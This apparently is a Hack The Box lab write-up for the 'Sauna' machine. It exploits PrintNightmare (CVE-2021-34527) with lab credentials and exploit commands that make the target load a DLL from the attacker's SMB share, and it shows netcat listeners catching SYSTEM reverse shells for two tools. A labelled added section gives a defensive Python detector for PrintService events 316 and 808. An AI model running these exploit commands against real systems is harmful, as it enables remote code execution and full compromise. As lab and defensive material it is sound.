CVE-2021-34527


CVE-2021-34527 is the remote variant of CVE-2021-1675; it is exploited over MSRPC through the MS-RPRN and MS-PAR protocols.

It works by exploiting a logic flaw in the MS-RPRN protocol's RpcAddPrinterDriverEx function.

There is also another route through the MS-PAR protocol's RpcAsyncAddPrinterDriver function. It is similar to RpcAddPrinterDriverEx, but has far fewer constraints and is not limited to domain controllers or Windows 10 systems with non-default settings.

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-rpcdump $IP | grep -iE 'MS-RPRN|MS-PAR'
protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
protocol: [MS-RPRN]: Print System Remote Protocol 

I ran a quick test to see if they are available, and they are indeed present on the target system. This is much expected, as there is a printer service running.

Exploit


The exploit is available online

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527]
└─$ simplesmb . -smb2support 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

The exploit requires an SMB server running on the attacker machine to host the DLL payload.

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527]
└─$ python3 cve-2021-34527.py egotistical-bank.local/fsmith:Thestrokes23@sauna.egotistical-bank.local '\\10.10.14.4\smb\printnightmare.dll'
[*] connecting to ncacn_np:sauna.egotistical-bank.local[\PIPE\spoolss]
[+] Bind OK
[+] pdriverpath found c:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_9543832f82bb474f\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.4\smb\printnightmare.dll
[*] Try 1...
[*] stage0: 0
[*] Try 2...
 
[...REDACTED]

Since I have the credentials of the fsmith user, I can just execute the exploit without even having to gain a foothold.

The target system connected to the Kali SMB server to fetch the DLL payload.
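From the defender's side, the driver installation the exploit performs above leaves a trace in the Microsoft-Windows-PrintService logs: the Operational log (which is not enabled by default and must be turned on to be useful) records Event ID 316, "Printer driver ... was added or updated. Files:- ...", listing the files named in the driver request, and the Admin log records Event ID 808, "The print spooler failed to load a plug-in module ...", when the spooler loads a dropped DLL. The Python below is an added example and is not part of the original writeup or of the exploit tooling. It runs over constructed sample event records (the texts are modelled on those two event types, using the page's own 10.10.14.4 share as the UNC source) and flags any driver file that is referenced by a UNC path or lies outside the DriverStore and spool directories, plus every plug-in load failure; the `Finding` and `PrintServiceEvent` types and the `analyze` function are names of this example, not of any Windows API.

```python
"""Flag suspicious print-driver installs in PrintService event records.

Added example: parses constructed Event 316 / 808 message texts and returns
findings for driver files sourced from UNC paths or untrusted directories.
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class PrintServiceEvent:
    event_id: int   # 316 = driver added/updated (Operational), 808 = plug-in load failure (Admin)
    message: str    # rendered event message text


@dataclass(frozen=True)
class Finding:
    event_id: int
    reason: str
    path: str


# Directories a legitimately installed driver file is expected to live in.
# Plain string literals, since raw strings cannot end in a backslash.
TRUSTED_PREFIXES = (
    "c:\\windows\\system32\\driverstore\\",
    "c:\\windows\\system32\\spool\\",
    "c:\\windows\\system32\\",
)

# \\host\share\file or the NT-style \??\UNC\host\share\file seen in the writeup.
UNC_RE = re.compile(r"^(\\\??\?\\UNC\\|\\\\)", re.IGNORECASE)
# "Files:- a.dll, b.dll, c.dll. No user action is required." -> captures the list.
FILES_RE = re.compile(r"Files:-\s*(.*?)\.\s*(?:No user action|$)", re.IGNORECASE | re.DOTALL)
# "failed to load a plug-in module <path>, error code ..." -> captures the path.
PLUGIN_RE = re.compile(r"failed to load a plug-in module\s+(\S+?),", re.IGNORECASE)


def classify_file(entry: str) -> Optional[str]:
    """Return a reason string if a driver file entry looks suspicious, else None."""
    e = entry.strip()
    if UNC_RE.match(e):
        return "driver file referenced by UNC path"
    if re.match(r"^[a-z]:\\", e, re.IGNORECASE):
        low = e.lower()
        if not any(low.startswith(p) for p in TRUSTED_PREFIXES):
            return "driver file outside DriverStore/spool directories"
        return None
    return None  # bare file name: resolved inside the driver's own directory


def analyze(events: List[PrintServiceEvent]) -> List[Finding]:
    """Walk event records and collect findings worth an analyst's attention."""
    findings: List[Finding] = []
    for ev in events:
        if ev.event_id == 316:
            m = FILES_RE.search(ev.message)
            if not m:
                continue
            for entry in m.group(1).split(","):
                reason = classify_file(entry)
                if reason:
                    findings.append(Finding(316, reason, entry.strip()))
        elif ev.event_id == 808:
            m = PLUGIN_RE.search(ev.message)
            path = m.group(1) if m else "<unparsed>"
            findings.append(Finding(808, "spooler failed to load a plug-in module", path))
    return findings


# Constructed sample records (not a real log export), modelled on the 316/808 message formats.
SAMPLE_EVENTS = [
    PrintServiceEvent(316, r"Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                           r"Files:- UNIDRV.DLL, kernelbase.dll, \\10.10.14.4\smb\printnightmare.dll. "
                           r"No user action is required."),
    PrintServiceEvent(316, r"Printer driver Microsoft XPS Document Writer v4 for Windows x64 Version-4 was added or updated. "
                           r"Files:- C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_9543832f82bb474f\Amd64\UNIDRV.DLL, kernelbase.dll. "
                           r"No user action is required."),
    PrintServiceEvent(316, r"Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                           r"Files:- UNIDRV.DLL, kernelbase.dll, \??\UNC\10.10.14.4\smb\printnightmare.dll. "
                           r"No user action is required."),
    PrintServiceEvent(808, r"The print spooler failed to load a plug-in module "
                           r"C:\Windows\system32\spool\DRIVERS\x64\3\printnightmare.dll, error code 0x45A. "
                           r"See the event user data for context information."),
]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"Event {f.event_id}: {f.reason}: {f.path}")
```

On a live host the same logic applies to the `Message` field of records pulled with Get-WinEvent from Microsoft-Windows-PrintService/Operational and /Admin; the legitimate XPS driver record produces no finding, while both UNC-sourced installs and the plug-in load failure do.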

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527]
└─$ nnc 1234 
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.175] 50663
Windows PowerShell running as user SAUNA$ on SAUNA
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
SAUNA
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::17a
   IPv6 Address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
   Link-local IPv6 Address . . . . . : fe80::64df:5bff:4879:1d8b%7
   IPv4 Address. . . . . . . . . . . : 10.10.10.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
                                       10.10.10.2

System Level Compromise

Other tool


┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527_v2]
└─$ python3 CVE-2021-34527_v2.py $IP -u fsmith -p Thestrokes23 -d EGOTISTICAL-BANK.LOCAL -proto MS-RPRN -dll printnightmare.dll --local-ip 10.10.14.4 -share smb
[*] starting PrintNightmare PoC
[+] Self-hosted payload at \\10.10.14.4\smb\printnightmare.dll
 
[*] Attempting target: 10.10.10.175
[*] Connecting to ncacn_np:10.10.10.175[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_9543832f82bb474f\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.4\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[-] Exploit returned: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
[*] Closing SMB Server

This tool has a built-in SMB server to host the DLL payload, which makes it handier.

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527_v2]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.175] 50642
Windows PowerShell running as user SAUNA$ on SAUNA
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
SAUNA
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::17a
   IPv6 Address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
   Link-local IPv6 Address . . . . . : fe80::64df:5bff:4879:1d8b%7
   IPv4 Address. . . . . . . . . . . : 10.10.10.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
                                       10.10.10.2

System Level Compromise